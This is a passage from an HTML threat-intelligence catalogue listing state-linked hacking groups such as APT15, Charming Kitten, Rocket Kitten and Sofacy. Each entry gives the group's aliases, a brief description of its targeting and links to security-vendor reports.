<h3 id="_mirage"><a class="anchor" href="#_mirage"></a><a class="link" href="#_mirage">Mirage</a></h3>
<div class="paragraph">
<p>Mirage is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Vixen Panda</p>
</li>
<li>
<p>Ke3Chang</p>
</li>
<li>
<p>GREF</p>
</li>
<li>
<p>Playful Dragon</p>
</li>
<li>
<p>APT 15</p>
</li>
<li>
<p>APT15</p>
</li>
<li>
<p>Metushy</p>
</li>
<li>
<p>Lurid</p>
</li>
<li>
<p>Social Network Team</p>
</li>
<li>
<p>Royal APT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2396. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html">https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/">http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nccgroup/Royal_APT">https://github.com/nccgroup/Royal_APT</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anchor_panda"><a class="anchor" href="#_anchor_panda"></a><a class="link" href="#_anchor_panda">Anchor Panda</a></h3>
<div class="paragraph">
<p>PLA Navy</p>
</div>
<div class="paragraph">
<p>Anchor Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT14</p>
</li>
<li>
<p>APT 14</p>
</li>
<li>
<p>QAZTeam</p>
</li>
<li>
<p>ALUMINUM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2397. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-anchor-panda/">http://www.crowdstrike.com/blog/whois-anchor-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nettraveler_2"><a class="anchor" href="#_nettraveler_2"></a><a class="link" href="#_nettraveler_2">NetTraveler</a></h3>
<div class="paragraph">
<p>NetTraveler is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 21</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2398. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/">https://securelist.com/blog/research/35936/nettraveler-is-running-red-star-apt-attacks-compromise-high-profile-victims/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ice_fog"><a class="anchor" href="#_ice_fog"></a><a class="link" href="#_ice_fog">Ice Fog</a></h3>
<div class="paragraph">
<p>Operate since at least 2011, from several locations in China, with members in Korea and Japan as well.</p>
</div>
<div class="paragraph">
<p>Ice Fog is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>IceFog</p>
</li>
<li>
<p>Dagger Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2399. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/">https://securelist.com/blog/research/57331/the-icefog-apt-a-tale-of-cloak-and-three-daggers/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/">https://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pitty_panda"><a class="anchor" href="#_pitty_panda"></a><a class="link" href="#_pitty_panda">Pitty Panda</a></h3>
<div class="paragraph">
<p>The Pitty Tiger group has been active since at least 2011. They have been seen using HeartBleed vulnerability in order to directly get valid credentials</p>
</div>
<div class="paragraph">
<p>Pitty Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PittyTiger</p>
</li>
<li>
<p>MANGANESE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2400. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2">http://blog.airbuscybersecurity.com/post/2014/07/The-Eye-of-the-Tiger2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_roaming_tiger"><a class="anchor" href="#_roaming_tiger"></a><a class="link" href="#_roaming_tiger">Roaming Tiger</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2401. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/">http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beijing_group"><a class="anchor" href="#_beijing_group"></a><a class="link" href="#_beijing_group">Beijing Group</a></h3>
<div class="paragraph">
<p>Beijing Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sneaky Panda</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_radio_panda"><a class="anchor" href="#_radio_panda"></a><a class="link" href="#_radio_panda">Radio Panda</a></h3>
<div class="paragraph">
<p>Radio Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shrouded Crossbow</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_apt_3102"><a class="anchor" href="#_apt_3102"></a><a class="link" href="#_apt_3102">APT.3102</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2402. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/">http://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_samurai_panda"><a class="anchor" href="#_samurai_panda"></a><a class="link" href="#_samurai_panda">Samurai Panda</a></h3>
<div class="paragraph">
<p>Samurai Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PLA Navy</p>
</li>
<li>
<p>APT4</p>
</li>
<li>
<p>APT 4</p>
</li>
<li>
<p>Wisp Team</p>
</li>
<li>
<p>Getkys</p>
</li>
<li>
<p>SykipotGroup</p>
</li>
<li>
<p>Wkysol</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2403. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-samurai-panda/">http://www.crowdstrike.com/blog/whois-samurai-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_impersonating_panda"><a class="anchor" href="#_impersonating_panda"></a><a class="link" href="#_impersonating_panda">Impersonating Panda</a></h3>
</div>
<div class="sect2">
<h3 id="_violin_panda"><a class="anchor" href="#_violin_panda"></a><a class="link" href="#_violin_panda">Violin Panda</a></h3>
<div class="paragraph">
<p>Violin Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT20</p>
</li>
<li>
<p>APT 20</p>
</li>
<li>
<p>APT8</p>
</li>
<li>
<p>APT 8</p>
</li>
<li>
<p>TH3Bug</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2404. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/">http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_toxic_panda"><a class="anchor" href="#_toxic_panda"></a><a class="link" href="#_toxic_panda">Toxic Panda</a></h3>
<div class="paragraph">
<p>A group targeting dissident groups in China and at the boundaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2405. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_temper_panda"><a class="anchor" href="#_temper_panda"></a><a class="link" href="#_temper_panda">Temper Panda</a></h3>
<div class="paragraph">
<p>China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors.</p>
</div>
<div class="paragraph">
<p>Temper Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Admin338</p>
</li>
<li>
<p>Team338</p>
</li>
<li>
<p>MAGNESIUM</p>
</li>
<li>
<p>admin@338</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2406. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html">https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pirate_panda"><a class="anchor" href="#_pirate_panda"></a><a class="link" href="#_pirate_panda">Pirate Panda</a></h3>
<div class="paragraph">
<p>Pirate Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT23</p>
</li>
<li>
<p>KeyBoy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2407. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india">https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/">http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flying_kitten"><a class="anchor" href="#_flying_kitten"></a><a class="link" href="#_flying_kitten">Flying Kitten</a></h3>
<div class="paragraph">
<p>Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.</p>
</div>
<div class="paragraph">
<p>Flying Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SaffronRose</p>
</li>
<li>
<p>Saffron Rose</p>
</li>
<li>
<p>AjaxSecurityTeam</p>
</li>
<li>
<p>Ajax Security Team</p>
</li>
<li>
<p>Group 26</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2408. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/">https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cutting_kitten"><a class="anchor" href="#_cutting_kitten"></a><a class="link" href="#_cutting_kitten">Cutting Kitten</a></h3>
<div class="paragraph">
<p>While tracking a suspected Iran-based threat group known as Threat Group-2889[1] (TG-2889), Dell SecureWorks Counter Threat Unit™ (CTU) researchers uncovered a network of fake LinkedIn profiles. These convincing profiles form a self-referenced network of seemingly established LinkedIn users. CTU researchers assess with high confidence the purpose of this network is to target potential victims through social engineering. Most of the legitimate LinkedIn accounts associated with the fake accounts belong to individuals in the Middle East, and CTU researchers assess with medium confidence that these individuals are likely targets of TG-2889.</p>
</div>
<div class="paragraph">
<p>Cutting Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ITSecTeam</p>
</li>
<li>
<p>Threat Group 2889</p>
</li>
<li>
<p>TG-2889</p>
</li>
<li>
<p>Ghambar</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2409. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/">http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_charming_kitten"><a class="anchor" href="#_charming_kitten"></a><a class="link" href="#_charming_kitten">Charming Kitten</a></h3>
<div class="paragraph">
<p>Charming Kitten (aka Parastoo, aka Newscaster) is an group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.</p>
</div>
<div class="paragraph">
<p>Charming Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Newscaster</p>
</li>
<li>
<p>Parastoo</p>
</li>
<li>
<p>iKittens</p>
</li>
<li>
<p>Group 83</p>
</li>
<li>
<p>Newsbeef</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2410. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Operation_Newscaster">https://en.wikipedia.org/wiki/Operation_Newscaster</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://iranthreats.github.io/resources/macdownloader-macos-malware/">https://iranthreats.github.io/resources/macdownloader-macos-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/">https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/">https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cryptome.org/2012/11/parastoo-hacks-iaea.htm">https://cryptome.org/2012/11/parastoo-hacks-iaea.htm</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf">https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/">https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf">https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks">https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt33"><a class="anchor" href="#_apt33"></a><a class="link" href="#_apt33">APT33</a></h3>
<div class="paragraph">
<p>Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.</p>
</div>
<div class="paragraph">
<p>APT33 is also known as:</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2411. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html">https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_magic_kitten"><a class="anchor" href="#_magic_kitten"></a><a class="link" href="#_magic_kitten">Magic Kitten</a></h3>
<div class="paragraph">
<p>Earliest activity back to November 2008. An established group of cyber attackers based in Iran, who carried on several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting Iranian political opposition.</p>
</div>
<div class="paragraph">
<p>Magic Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Group 42</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2412. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/">http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rocket_kitten"><a class="anchor" href="#_rocket_kitten"></a><a class="link" href="#_rocket_kitten">Rocket Kitten</a></h3>
<div class="paragraph">
<p>Targets Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.</p>
</div>
<div class="paragraph">
<p>Rocket Kitten is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TEMP.Beanie</p>
</li>
<li>
<p>Operation Woolen Goldfish</p>
</li>
<li>
<p>Thamar Reservoir</p>
</li>
<li>
<p>Timberworm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2413. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing">https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf">https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/thamar-reservoir/">http://www.clearskysec.com/thamar-reservoir/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2015/08/iran_two_factor_phishing/">https://citizenlab.org/2015/08/iran_two_factor_phishing/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf">https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/shamoon-multi-staged-destructive-attacks-limited-specific-targets">https://www.symantec.com/connect/blogs/shamoon-multi-staged-destructive-attacks-limited-specific-targets</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Rocket_Kitten">https://en.wikipedia.org/wiki/Rocket_Kitten</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cleaver_2"><a class="anchor" href="#_cleaver_2"></a><a class="link" href="#_cleaver_2">Cleaver</a></h3>
<div class="paragraph">
<p>A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies.</p>
</div>
<div class="paragraph">
<p>Cleaver is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Operation Cleaver</p>
</li>
<li>
<p>Tarh Andishan</p>
</li>
<li>
<p>Alibaba</p>
</li>
<li>
<p>2889</p>
</li>
<li>
<p>TG-2889</p>
</li>
<li>
<p>Cobalt Gypsy</p>
</li>
<li>
<p>Ghambar</p>
</li>
<li>
<p>Cutting Kitten</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2414. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn2.hubspot.net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf">http://cdn2.hubspot.net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/the-curious-case-of-mia-ash">https://www.secureworks.com/research/the-curious-case-of-mia-ash</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/">http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sands_casino"><a class="anchor" href="#_sands_casino"></a><a class="link" href="#_sands_casino">Sands Casino</a></h3>
</div>
<div class="sect2">
<h3 id="_rebel_jackal"><a class="anchor" href="#_rebel_jackal"></a><a class="link" href="#_rebel_jackal">Rebel Jackal</a></h3>
<div class="paragraph">
<p>This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.</p>
</div>
<div class="paragraph">
<p>Rebel Jackal is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FallagaTeam</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_viking_jackal"><a class="anchor" href="#_viking_jackal"></a><a class="link" href="#_viking_jackal">Viking Jackal</a></h3>
<div class="paragraph">
<p>Viking Jackal is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Vikingdom</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_sofacy_2"><a class="anchor" href="#_sofacy_2"></a><a class="link" href="#_sofacy_2">Sofacy</a></h3>
<div class="paragraph">
<p>The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.</p>
</div>
<div class="paragraph">
<p>Sofacy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 28</p>
</li>
<li>
<p>APT28</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>TsarTeam</p>
</li>
<li>
<p>TG-4127</p>
</li>
<li>
<p>Group-4127</p>
</li>
<li>
<p>STRONTIUM</p>
</li>
<li>
<p>TAG_0700</p>
</li>
<li>
<p>Swallowtail</p>
</li>
<li>
<p>IRON TWILIGHT</p>
</li>
<li>
<p>Group 74</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2415. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Sofacy_Group">https://en.wikipedia.org/wiki/Sofacy_Group</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf">https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf">https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf</a></p></td>
</tr>
<tr>
